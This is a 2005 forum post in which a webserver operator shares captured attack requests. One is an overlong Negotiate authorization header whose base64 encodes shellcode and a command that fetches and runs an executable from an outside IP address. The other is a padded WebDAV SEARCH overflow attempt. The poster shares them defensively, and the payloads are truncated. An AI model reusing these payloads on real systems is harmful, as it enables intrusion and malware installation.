Thread: webserver attack attempt
View Single Post
  #1 (permalink)  
Old 07-14-2005, 12:24 PM
yarmfelder@yahoo.com
Guest
  
Posts: n/a
Default webserver attack attempt
I've got some people who are trying to attack my
webserver, which is not Apache. But I would guess
they think it is, or perhaps they think it is
M$.

What they do is one of two things: either
they will send an HTTP request that is far too
short, or one that is far too long. An example
of the long kind:

GET / HTTP/1.0
Authorization: Negotiate
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQU FBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ UFBQUFBQUFBQUFBQUFBQUFBQQMAI4I
MVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAd Af
Byg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDM cBki0AwhcB4D4tADItwHK2LaAjpCwA
AAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDcwLjI2LjI
yOS4xMDQgR0VUIHdjbnNmdHkuZXhlJnN0YXJ0IHdjbnNmdHkuZ XhlJmV4aXQAQkJCQkJCQkJCQkJCQkJ

.... and it goes on from there, beyond the maximum number of
bytes that is allowed. Of course, this has no effect, because
it's a well written server. But I suppose that if someone were
to decode that string, they might find some runnable code in
there.

Another long one follows. Notice it is neither GET nor POST.

SEARCH
/.^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^ B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B± ^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B ±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±
....etc.

YF


Reply With Quote